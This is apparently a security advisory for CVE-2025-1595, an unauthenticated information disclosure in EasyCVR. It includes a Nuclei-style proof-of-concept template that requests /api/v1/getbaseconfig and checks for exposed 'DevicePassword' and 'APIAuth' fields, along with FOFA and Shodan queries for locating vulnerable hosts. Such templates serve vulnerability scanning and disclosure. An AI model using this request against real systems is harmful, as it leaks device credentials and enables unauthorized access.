A vulnerability has been found in Anhui Xufan Information Technology EasyCVR up to 2.7.0 and classified as problematic. This vulnerability affects unknown code of the file /api/v1/getbaseconfig. The manipulation leads to information disclosure. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.
PoC代码[已公开]
id: CVE-2025-1595
info:
name: EasyCVR <=2.1.2 - Information Disclosure
author: ritikchaddha
severity: medium
description: |
A vulnerability has been found in Anhui Xufan Information Technology EasyCVR up to 2.7.0 and classified as problematic. This vulnerability affects unknown code of the file /api/v1/getbaseconfig. The manipulation leads to information disclosure. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2025-1595
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2025-1595
epss-score: 0.03238
epss-percentile: 0.86632
cwe-id: CWE-200
metadata:
verified: true
max-request: 1
fofa-query: title="EasyCVR"
shodan-query: http.title:"EasyCVR"
product: easycvr
tags: cve,cve2025,exposure,easycvr
http:
- method: GET
path:
- "{{BaseURL}}/api/v1/getbaseconfig"
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'DevicePassword":'
- 'APIAuth":'
condition: and
- type: word
part: content_type
words:
- application/json
- type: status
status:
- 200
# digest: 4b0a00483046022100eb73c0052074f006793ca4feb39cd4101454f7550e5ddef4e51faafb67f79fc7022100eb499c8d4d5368be34ffe70ea2692f945fe78fb9abc55b82128e6794dae6035a:922c64590222798bb761d5b6d8e72950